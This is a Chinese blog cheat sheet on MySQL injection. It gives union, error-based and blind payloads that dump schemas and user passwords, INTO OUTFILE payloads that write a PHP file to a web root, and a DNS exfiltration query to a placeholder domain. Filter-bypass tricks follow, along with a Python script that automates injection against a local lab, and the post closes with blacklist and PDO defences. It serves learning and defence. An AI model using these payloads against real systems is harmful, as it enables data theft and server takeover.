<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="MySql Injection Conclusion">
<meta property="og:url" content="http://passer6y.fun/2017/12/23/Sql injection Conclusion/index.html">
<meta property="og:site_name" content="Passerby&#39;s Blog">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrx0wif4cj31fe0k4din.jpg">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrxjhcopnj30q305h0sr.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/0060lm7Tly1fmrxklb9g9j30om0380sv.jpg">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrxxaivg0j30nx0jhaak.jpg">
<meta property="og:image" content="http://dl2.iteye.com/upload/attachment/0082/1266/cfa06567-b3c0-3976-a33f-83273f7a6622.jpg">
<meta property="og:image" content="http://dl2.iteye.com/upload/attachment/0082/1268/78ca895f-3dcf-39f3-a452-cb347a4807d1.jpg">
<meta property="og:image" content="http://dl2.iteye.com/upload/attachment/0082/1270/4b73404b-3cc7-37c7-8679-5200e7dc872e.jpg">
<meta property="og:image" content="http://dl2.iteye.com/upload/attachment/0082/1272/1853a6e4-6e77-3297-921f-19132a5df698.jpg">
<meta property="og:updated_time" content="2018-06-11T11:19:20.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MySql Injection Conclusion">
<meta name="twitter:image" content="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrx0wif4cj31fe0k4din.jpg">



  <link rel="alternate" href="/atom.xml" title="Passerby's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://passer6y.fun/2017/12/23/Sql injection Conclusion/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>MySql Injection Conclusion | Passerby's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passerby's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://passer6y.fun/2017/12/23/Sql injection Conclusion/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passerby's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">MySql Injection Conclusion
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2017-12-23 20:51:00" itemprop="dateCreated datePublished" datetime="2017-12-23T20:51:00+08:00">2017-12-23</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2018-06-11 19:19:20" itemprop="dateModified" datetime="2018-06-11T19:19:20+08:00">2018-06-11</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/SQL/" itemprop="url" rel="index"><span itemprop="name">SQL</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/12/23/Sql injection Conclusion/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2017/12/23/Sql injection Conclusion/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2017/12/23/Sql injection Conclusion/" class="leancloud_visitors" data-flag-title="MySql Injection Conclusion">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Views: </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id=""><a href="#" class="headerlink" title=""></a><img src="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrx0wif4cj31fe0k4din.jpg" alt="sql 注入导图"></h2><a id="more"></a>
<h1 id="0x02-基于有正确回显的注入"><a href="#0x02-基于有正确回显的注入" class="headerlink" title="0x02 基于有正确回显的注入"></a>0x02 基于有正确回显的注入</h1><p>1.判断注入点、注入位置<br><br>2.判断是否被过滤，绕过<br><br>3.order by联合查询，找到对应的列数<br><br>4.联合查询注入：<br><del><em>这里假设有三个字段</em></del><br><br>①爆库：  </p>
<pre><code>id=-1&apos; union select 1,group_concat(schema_name),3 from information_schema.schemata --+
</code></pre><p>②爆表名：<del><em>这里假设爆出了security数据库</em></del><br></p>
<pre><code>id=-1&apos; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&apos;security&apos; --+
</code></pre><p>③爆列名:<del><em>假设爆出一个users表</em></del><br></p>
<pre><code>id=-1&apos; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&apos;users&apos; --+
</code></pre><p>④爆数据：</p>
<pre><code>id=-1&apos; Union select 1,username,password from users limit 0,1 --+
</code></pre><p>Tips:</p>
<blockquote>
<p>有时候可能当前页面数据库和敏感信息数据库不是同一个库，所以有时候会这样写<br>id=-1’ Union select 1,username,password from security.users limit 0,1 –+<br>或者id=-1’ Union select 1,username,password from `users` limit 0,1 –+  </p>
</blockquote>
<h1 id="0x03-基于构造错误sql语句的报错注入"><a href="#0x03-基于构造错误sql语句的报错注入" class="headerlink" title="0x03 基于构造错误sql语句的报错注入"></a>0x03 基于构造错误sql语句的报错注入</h1><p><strong>1.  需要知道以下几个函数：<br></strong><br>    ①Group by: 分组，合并相同的，并且按字母顺序排列。<br><br>    ②rand()   // 随机函数（0，1）<br><br>    ③floor() //取整函数 比如floor(1.2)=1 <br><br>    ④count()  //汇总函数<br><br><strong>2.  原理:</strong> <br><br>   简而言之就是利用 select count(<em>),concat(floor(random(0)</em>2))as key from…….group by key来报错。<br><br>    即rand函数产生的随机数取整之后被 group by 子句被分为key值等于1 和0 两类，然后count()统计该类型下的个数<br><img src="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrxjhcopnj30q305h0sr.jpg" alt=""><br>    可以发现有时候回报错<br><img src="http://ww1.sinaimg.cn/large/0060lm7Tly1fmrxklb9g9j30om0380sv.jpg" alt=""><br>    我们就可以通过这种手段来获取敏感信息</p>
<pre><code>那么问题来了：为什么会报错呢？
双注入的原理，简单一句话原理就是有研究人员发现，当在一个聚合函数，比如count函数后面如果使用分组语句（group by）就会把查询的一部分以错误的形式显示出来“通过floor报错的方法来爆数据的本质是group by语句的报错。
Group by 在分组的时候先会对前面的concat(floor(rand()*2))进行检测，无疑只有0和1 两种结果 进行分类，然后就会插入这条数据 插入的过程中又会再进行一次计算 如果检测所计算出来的数和插入时所计算出来的数不一样，这个时候就会报错。&lt;br /&gt;
</code></pre><p><strong>3.实际操作(和有正确回显的操作类似)</strong><br><br>①爆库：</p>
<pre><code>?id=-1&apos; and  (select 1  from (select count(*),concat(0x3a,(select schema_name from information_schema.schemata  limit 0,1 ),floor(rand()*2 ),0x3a,0x3a )name from  information_schema.tables group by name) b) --+
</code></pre><p>②爆表名<br>③爆列名<br>④爆数据：</p>
<pre><code>?id=-1&apos; and  (select 1  from (select count(*),concat(0x3a,(select password from users limit 0,1 ),floor(rand()*2 ),0x3a,0x3a )name from  information_schema.tables group by name) b) --+
</code></pre><blockquote>
<p><strong>其他更多函数的报错注入</strong><br>extractvalue()、updatexml()、GeometryCollection()、polygon()、multipoint()、multilinestring()、multipolygon()、linestring()、exp()<br>以后再深入练习吧..  </p>
</blockquote>
<h1 id="0x04基于文件读写权限的注入"><a href="#0x04基于文件读写权限的注入" class="headerlink" title="0x04基于文件读写权限的注入"></a>0x04基于文件读写权限的注入</h1><p><strong>1.前提：</strong><br>需要my.ini(phpstudy中)里面的 secur_file_priv变量为空，不敢一般MySQL5.5.53之前的版本默认为空，之后的版本为null，所以说这种注入比较依赖MySQL的版本。<br>可以使用：select @@secure_file_priv来查询权限。<br>关于secur_file_priv变量更多：</p>
<blockquote>
<p>如果变量设置为目录的名称，则服务器会将导入和导出操作限制在跟这个目录中一起使用。这个目录必须存在，服务器不会自己创建它。<br>如果变量为空，则不会产生影响，引起不安全的配置。<br>如果变量设置为NULL，那么服务器就会禁用导入和导出操作。这个值从MySQL 5.5.53版本开始允许。</p>
</blockquote>
<p><strong>2.需要知道的函数：</strong><br>①Load_file：读文件<br>②INTO DUMPFILE/OUTFILE：将表的内容导出为一个文本文件  </p>
<blockquote>
<p>Tips：<br>INTO OUTFILE函数写文件时会在每一行的结束自动加上换行符<br>INTO DUMPFILE函数在写文件会保持文件得到原生内容，这种方式对于二进制文件是最好的选择   </p>
</blockquote>
<p>实际演示：<br>select * from users into outfile ‘d:/1.txt’;<br>select load_file(‘d:/1.txt’)<br><img src="http://ww4.sinaimg.cn/large/0060lm7Tly1fmrxxaivg0j30nx0jhaak.jpg" alt=""><br>3.实际操作(两种思路)<br>①上菜刀  </p>
<pre><code>?id=1&apos;)) union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile &apos;D:/phpStudy/www/1234.php&apos;   --+
</code></pre><blockquote>
<p>Tips：?在URL里面表示传参，如果一句话木马里面有 ?php  所以用get传参的 会将php当作变量。</p>
</blockquote>
<p>②改扩展名绕过操作：</p>
<pre><code>?id=1&apos;)) union select 1,2,load_file(&apos;D:/phpStudy/www/1234.php&apos;) into outfile &apos;D:/phpStudy/www/123455.txt&apos;   --+
</code></pre><h1 id="0x05盲注"><a href="#0x05盲注" class="headerlink" title="0x05盲注"></a>0x05盲注</h1><p><strong>1.相关函数：</strong><br>①length():返回字符串的长度<br>②substr():截取字符串<br>  substr(a,b,c)从b位置开始，截取字符串a的c长度，ascii()将字符转换为ascii码格式。<br>③ascii():返回字符的ascii码<br>④if():<br>If(exor1,expr2,expr3)在mysql中是第一个参数成立的时候执行第二个参数，否则执行第三个参数<br><strong>2.实际操作：</strong><br>①判断注入点：  </p>
<pre><code>Id=-1&apos; or sleep(5) --+
</code></pre><p>②爆库：  </p>
<pre><code>If(Ascii(substr(select schema_name from information_schema.schemata limit 0,1),1,1))=100,sleep(),null)as name
</code></pre><p>③爆表<br>④爆字段<br>⑤爆数据<br>都是一样的套路  </p>
<blockquote>
<p>Tips：<br>substr()的小技巧：例如在substr(database(),1,1)中逗号被过滤了，我们可以使用from 1 to 1来绕过过滤。<br>那么有同样格式的limit 0,1有没有这样的绕过呢？当然有。格式为：1 offset 0这里注查询数字的顺序。</p>
</blockquote>
<h1 id="0x06多种位置的注入："><a href="#0x06多种位置的注入：" class="headerlink" title="0x06多种位置的注入："></a>0x06多种位置的注入：</h1><p>其实都是一样的方法，只是位置不一样。<br>一般来说，有以下几种注入位置：<br>1.Get、Post<br>2.UA头<br>3.referer头<br>4.cookie</p>
<h1 id="0x07带外通道："><a href="#0x07带外通道：" class="headerlink" title="0x07带外通道："></a>0x07带外通道：</h1><p><strong>什么是带外通道注入？</strong></p>
<blockquote>
<p>使用背景：<br>在进行sql注入攻击的时候我们经常会遇见无回显的情况，那我们就不能进行注入了么？<br>其实攻击可能已经成功了，But应用程序未返回任何结果，使你误以为攻击失败。<br>一种获取数据的有效方法是使用带外通道<br>能够在数据库中执行任意SQL语句后,我们可以利用数据的一些内置功能在数据库与自己的计算机直接建立网络连接,通过它传送从数据库中收集的任何信息<br>一般可以提取数据的途径:<br>通过HTTP(S)请求、DNS剖析、文件系统、电子邮件等等</p>
</blockquote>
<p><strong>对于MySQL而言</strong><br>同样和文件读写一样，需要secure_file_priv这个全局变量控制的权限，具体见0x03中对该变量的介绍。<br>利用条件：  </p>
<ul>
<li>全局变量secure_file_priv = ‘ ‘  </li>
<li>可以用SQL server连接到mysql数据库    </li>
</ul>
<p><strong>使用DNS解析提取数据</strong><br>在mysql中会对查询语句中的ip和网址尝试DNS解析。例如：</p>
<pre><code>select load_file(concat(‘\\\\’,version()’yoursite.com\\a.txt’));
</code></pre><p>然后我们可以通过抓包看MySql发出的DNS查询数据<br>或者使用网上现成的<a href="http://dnsbin.zhack.ca/" target="_blank" rel="noopener">http://dnsbin.zhack.ca/</a> 就可以看到mysql发送过来的数据</p>
<!--**以2017HCTF为例**
部分源码
如下：

    <?php
    echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br />";
    echo "flag is hctf{what you get}<br /><br />";
    error_reporting(E_ALL^E_NOTICE^E_WARNING);
    try {
       $conn = new PDO( "sqlsrv:Server=*****;Database=not_here","oob", ""); 
    }
    catch( PDOException $e ) {
       die( "Error connecting to SQL Server".$e->getMessage() ); 
    }
    #echo "Connected to MySQL<br />";
    echo "Connected to SQL Server<br />";
    $id = $_GET['id'];
    if(preg_match('/EXEC|xp_cmdshell|sp_configure|xp_reg(.*)|CREATE|DROP|declare|insert|into|outfile|dumpfile|sleep|wait|benchmark/i', $id)) {
        die('NoNoNo');
    }
    $query = "select message from not_here_too where id = $id"; //link server: On  linkname:mysql
    $stmt = $conn->query( $query ); 
    while ( @$row = $stmt->fetch( PDO::FETCH_ASSOC ) ){
        //TO DO: ...
        //It's time to sleep...
    }
    ?>                
 -->   
<h1 id="0x08各种绕过姿势："><a href="#0x08各种绕过姿势：" class="headerlink" title="0x08各种绕过姿势："></a>0x08各种绕过姿势：</h1><p><strong>绕过单引号</strong></p>
<p><strong>大小写绕过</strong>     </p>
<pre><code>?id=1+UnIoN+SeLecT+1,2,3--  
</code></pre><p><strong>替换绕过</strong>  </p>
<pre><code>?id=1+UNunionION+SEselectLECT+1,2,3--  
</code></pre><p><strong>注释绕过</strong></p>
<pre><code>?id=1+un/**/ion+se/**/lect+1,2,3--
</code></pre><p><strong>特殊嵌入绕过</strong></p>
<pre><code>?id=1/*!UnIoN*/SeLecT+1,2,3--  //在别的数据库中是注释但是在mysql中可以成功执行在语句前可以加上5位数字，代表版本号，表示只有在大于该版本的mysql中不作为注释 
</code></pre><p><strong>宽字节注入</strong><br>SQL注入中的宽字节国内最常使用的gbk编码，这种方式主要是绕过addslashes等对特殊字符进行转移的绕过。反斜杠()的十六进制为%5c，在你输入%bf%27时，函数遇到单引号自动转移加入\，此时变为%bf%5c%27，%bf%5c在gbk中变为一个宽字符“縗”。%bf那个位置可以是%81-%fe中间的任何字符。不止在sql注入中，宽字符注入在很多地方都可以应用。<br>在我们代码审计的过程中产生这个注入的原因有两个<br>1.character_set_client=gbk(SET NAMES的误用)<br>2.mysql_real_escape_string()的错误使用</p>
<p><strong>二次urldecode注入绕过</strong><br>在我们代码审计的时候如果某处用了urldecode或者rawurldecode函数，则会二次解码(webserver和该函数)而绕过gpc或者是addslashes等过滤函数。</p>
<p><strong>特殊字符绕过空格</strong>  </p>
<p>Example: </p>
<pre><code>&apos;%0AUNION%0CSELECT%A0NULL%20%23
</code></pre><p><strong>注释符&amp;引号</strong></p>
<pre><code>①SELECT DISTINCT(db) FROM mysql.db WHERE `Host`=&apos;localhost&apos; and/**/1=1;
②SELECT DISTINCT(db) FROM mysql.db WHERE `Host`=&apos;localhost&apos; and&quot;1=1&quot;;
</code></pre><p><strong>编码绕过</strong><br>URL编码、HEX编码、Base64编码</p>
<h1 id="0x09利用工具"><a href="#0x09利用工具" class="headerlink" title="0x09利用工具"></a>0x09利用工具</h1><p>1.sqlmap<br>2.Pangolin（穿山甲）<br>3.Domain等等  </p>
<h1 id="0x10如何用python写工具？"><a href="#0x10如何用python写工具？" class="headerlink" title="0x10如何用python写工具？"></a>0x10如何用python写工具？</h1><p>在我简单学习了requests库、和re库之后，编写了一个简单的脚本(第一次写bug有点多、局限也很多..)  </p>
<pre><code>#coding=UTF-8
import re
import requests
from bs4 import BeautifulSoup
import sys
reload(sys)
sys.setdefaultencoding(&apos;utf8&apos;)

def getHTMLText(url):
    try:
        r = requests.get(url)
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        return r.text
    except:
        print(&quot;getHTMLText error&quot;)
    return &quot;getHTMLText right&quot;

#捕捉返回的错误，判断注入点
def sqlloc_error(html,url,lists):
    try:
        error = re.search(r&apos;syntax&apos;,html)
        if error:
            lists.append(url)
    except:
        return &quot;rightback error&quot;

#构造注入点的url
def testsql(start_url,lists):
    injects = [&apos;\&apos;&apos; , &apos;\&quot;&apos; ,&apos;)&apos;, &apos;\&apos;)&apos;, &apos;\&quot;)&apos;]
    for inject in injects:
        url = start_url + inject
        html = getHTMLText(url)
        sqlloc_error(html,url,lists)


#捕捉爆库返回的字段
def sqlrep_back(html,payload_reps):
    try:
        soup = BeautifulSoup(html,&quot;html.parser&quot;)
        Rep = soup.select(&quot;font &gt; font&quot;)
        NRep = Rep[0].text
        NNRep = NRep.split(&apos;:&apos;)[2]
        num = len(NNRep.split(&apos;,&apos;))
        for i in range(num):
            payload_reps.append(NNRep.split(&apos;,&apos;)[i])
            print(payload_reps[i])

    except:
        return &quot;sqlrep_back error&quot;


#爆库(这里还没有实现自动判断字段数，下面的payload也可以写成批量)
def BoomRepository(list,payload_reps):
    newurl = list + &quot; union select 1,2,group_concat(schema_name) from information_schema.schemata --+&quot;
    html = getHTMLText(newurl)
    sqlrep_back(html,payload_reps)

#捕捉爆出的表
def sqltab_back(html,payload_tables):
    try:
        soup = BeautifulSoup(html,&apos;html.parser&apos;)
        Tab = soup.select(&quot;font &gt; font&quot;)
        NTab = Tab[0].text
        NNTab = NTab.split(&apos;:&apos;)[2]
        num = len(NNTab.split(&apos;,&apos;))
        for i in range(num):
            payload_tables.append(NNTab.split(&apos;,&apos;)[i])
            print(payload_tables[i])
    except:
        print(&quot;sqltab_back error&quot;)


#爆表
def BoomTable(list,payload_columns,payload_tables,payload_reps):
    for payload_rep in payload_reps:
        newurl = list + &quot; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&apos;&quot; + payload_rep + &quot;&apos; --+&quot;
        print(&quot;-----------正在爆&quot; + payload_rep + &quot;库的表-----------&quot;)
        html = getHTMLText(newurl)
        sqltab_back(html,payload_tables)
        for payload_table in payload_tables:
            print(&quot;-------------------------正在爆&quot; + payload_rep +&quot;库的&quot; + payload_table + &quot;表的字段-------------------------&quot;)
            Boomcolumn(list, payload_tables,payload_columns)


#捕捉爆出的字段
def sqlcol_back(html,payload_columns):
    try:
        soup = BeautifulSoup(html,&apos;html.parser&apos;)
        Col = soup.select(&quot;font &gt; font&quot;)
        NCol = Col[0].text
        NNCol = NCol.split(&apos;:&apos;)[2]
        num = len(NNCol.split(&apos;,&apos;))
        for i in range(num):
            payload_columns.append(NNCol.split(&apos;,&apos;)[i])
            print(payload_columns[i])
    except:
        print(&quot;sqlcol_back error&quot;)
#爆字段
def Boomcolumn(list, payload_tables,payload_columns):
    for payload_table in payload_tables:
        newurl = list + &quot; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&apos;&quot; + payload_table + &quot;&apos; --+&quot;
        html = getHTMLText(newurl)
        sqlcol_back(html, payload_columns)

def main():
    lists = []  #判断是否有注入点的url
    payload_reps = [] #爆出来的库的列表
    payload_tables = [] #爆出来的表的列表、
    payload_columns = [] #爆出来的字段
    start_url = &apos;http://127.0.0.1/sqli-labs-master/Less-1/?id=-1&apos;
    testsql(start_url,lists)
    print(&quot;-----------------------正在爆库--------------------------&quot;)
    BoomRepository(lists[0], payload_reps)
    print(&quot;------------------------正在爆表--------------------------&quot;)
    BoomTable(lists[0], payload_columns, payload_tables, payload_reps)

main()                
</code></pre><h1 id="0x11如何防御？"><a href="#0x11如何防御？" class="headerlink" title="0x11如何防御？"></a>0x11如何防御？</h1><blockquote>
<p><strong>引发SQL注入漏洞的原因：</strong><br>动态SQL或者将SQL查询组装成包含受用户控制的输入的字符串并提交给数据库</p>
</blockquote>
<h3 id="使用黑名单验证"><a href="#使用黑名单验证" class="headerlink" title="使用黑名单验证"></a><strong>使用黑名单验证</strong></h3><p>我们进行SQL注入的时候肯定离不开这些关键词：</p>
<ul>
<li>and、or、order </li>
<li>insert、into</li>
<li>delete</li>
<li>replace、update </li>
<li>union、select</li>
<li>load_file、outfile</li>
<li>和一些特殊符号  </li>
</ul>
<p>具体的实现代码：</p>
<pre><code>private function filter_keyword( $string ) { 
$keyword=&apos;select|insert|update|delete|\&apos;|\/\*|\*|\.\.\/|\.\/|union|and|union|order|or|into|load_file|outfile&apos;; 
$arr = explode( &apos;|&apos;, $keyword ); 
$result = str_ireplace( $arr, &apos;&apos;, $string ); 
return $result; 
} 
</code></pre><p>当然这里这是一个基本的思路，实际环境中还需要更强大的正则来进行黑名单过滤。</p>
<h3 id="正确使用过滤方式"><a href="#正确使用过滤方式" class="headerlink" title="正确使用过滤方式"></a><strong>正确使用过滤方式</strong></h3><p>1.gpc/runtime魔术引号：bug来源无非两种方式，一种是从类似于get、post等中被动式的获得参数;还有一种是主动的获得参数，比如读取远程页面或者文件。所以gpc/runtime在这就很重要了。<br>2.addslashes函数(字符型防御)、mysql_[real_]escape_string函数、intval函数等等</p>
<h3 id="使用预处理语句：PDO"><a href="#使用预处理语句：PDO" class="headerlink" title="使用预处理语句：PDO"></a><strong>使用预处理语句：PDO</strong></h3><blockquote>
<p><strong>什么是PDO？</strong><br>PDO是PHP Data Objects（php数据对象）的缩写。是在php5.1版本之后开始支持pdo。你可以把pdo看做是php提供的一个类。它提供了一组数据库抽象层API，使得编写php代码不再关心具体要连接的数据库类型。你既可以用使用pdo连接mysql，也可以用它连接oracle。并且pdo很好的解决了sql注入问题。  </p>
<p><strong>为什么要使用PDO查询?</strong><br>使用传统的 mysql_connect 、mysql_query方法来连接查询数据库时，如果过滤不严紧，就有SQL注入风险。虽然可以用mysql_real_escape_string()函数过滤用户提交的值，但是也有缺陷。而使用PHP的PDO扩展的 prepare 方法，就可以避免sql injection 风险。</p>
</blockquote>
<h4 id="具体实现方法"><a href="#具体实现方法" class="headerlink" title="具体实现方法"></a>具体实现方法</h4><pre><code>$dbh = new PDO(&quot;mysql:host=localhost; dbname=demo&quot;, &quot;user&quot;, &quot;pass&quot;);
$dbh-&gt;setAttribute(PDO::ATTR_EMULATE_PREPARES, false); //禁用prepared statements的仿真效果，确保传递到mysql服务器之前没有被PHP解析(禁止了所有可能的sql注入)  
$dbh-&gt;exec(&quot;set names &apos;utf8&apos;&quot;); 
$sql=&quot;select * from test where name = ? and password = ?&quot;;
$stmt = $dbh-&gt;prepare($sql); 
$exeres = $stmt-&gt;execute(array($testname, $pass)); 
if ($exeres) { 
while ($row = $stmt-&gt;fetch(PDO::FETCH_ASSOC)) {
print_r($row);
}
}
$dbh = null;
</code></pre><p>其实到这里我也不是很懂原理，然后搜索了一下资料了解了一下PHP与 mysql sever通讯细节：</p>
<blockquote>
<p>为何PDO能防SQL注入？<br>请先看以下PHP代码：  </p>
</blockquote>
<pre><code>&lt;?php
$pdo = new PDO(&quot;mysql:host=192.168.0.1;dbname=test;charset=utf8&quot;,&quot;root&quot;);
$conn-&gt;setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION); // set the PDO error mode to exception
$st = $pdo-&gt;prepare(&quot;select * from info where id =? and name = ?&quot;);
$id = 21;
$name = &apos;zhangsan&apos;;
$st-&gt;bindParam(1,$id);
$st-&gt;bindParam(2,$name);
$st-&gt;execute();
$st-&gt;fetchAll();
?&gt;
</code></pre><blockquote>
